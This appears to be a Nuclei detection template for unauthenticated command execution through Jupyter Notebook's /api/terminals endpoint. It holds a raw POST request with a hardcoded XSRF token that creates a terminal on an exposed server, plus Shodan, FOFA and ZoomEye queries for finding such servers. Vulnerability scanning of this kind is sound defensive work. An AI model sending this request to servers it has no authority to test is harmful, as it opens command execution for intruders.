id: jupyter-notebook-rce info: name: Jupyter Notebook - Remote Command Execution author: HuTa0 severity: high description: | Jupyter Notebook is an interactive Notebook, computer application is a web based visualization, Jupyter Notebook API/terminals path there are loopholes in the remote command execution. reference: - https://github.com/SCAMagic/SCAMagicScan/blob/de8130a2280ee08d719ac6612e590b8e2678fb97/pocs/poc-yaml-jupyter-notebook-rce.py metadata: max-request: 1 verified: true shodan-query: title:"jupyter notebook" fofa-query: title="jupyter notebook" zoomeye-query: title:"jupyter notebook" tags: jupyter,notebook,rce,bypass http: - raw: - | POST /api/terminals HTTP/1.1 Host: {{Hostname}} X-XSRFToken: 2|7a4faae0|819f5adf7edaef5e74502c9d0c75a604|1653492335 Cookie: _xsrf=2|7a4faae0|819f5adf7edaef5e74502c9d0c75a604|1653492335 matchers-condition: and matchers: - type: word words: - '"name":' - '"last_activity":' condition: and - type: word part: header words: - application/json - type: status status: - 200